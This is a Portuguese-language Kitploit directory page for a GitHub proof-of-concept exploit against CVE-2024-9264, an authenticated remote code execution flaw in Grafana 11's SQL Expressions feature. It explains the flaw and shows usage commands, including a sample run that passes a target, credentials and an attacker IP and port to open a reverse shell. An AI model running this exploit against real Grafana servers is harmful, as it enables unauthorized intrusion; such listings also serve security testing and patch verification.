Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9264 — RCE autenticado no Grafana (v11.0) via Expressões SQL - Exploit de PoC | Kitploit
Ferramentas/GitHubGitHub/rvzsec/cve-2024-9264
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubrvzsec/cve-2024-9264

CVE-2024-9264

RCE autenticado no Grafana (v11.0) via Expressões SQL - Exploit de PoC

Ver Repositório
21há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9264

RCE autenticado no Grafana (v11.0) via Expressões SQL - Exploit PoC



logo

CVE-2024-9264 - Grafana v11.0
Execução Remota de Código Autenticada (RCE)

PoC


Introdução

CVE-2024-9264 é uma falha crítica de execução remota de código e inclusão de arquivos locais introduzida no recurso experimental “Expressões SQL” do Grafana 11. A API passa SQL fornecido pelo usuário diretamente para a CLI do DuckDB sem sanitização adequada, portanto qualquer conta autenticada com privilégios de Viewer ou superiores pode injetar comandos de shell ou ler arquivos arbitrários, desde que o binário duckdb esteja no PATH do servidor.


Uso

root@kitploit:~
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>

Exemplo:

root@kitploit:~
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
Baixar ferramenta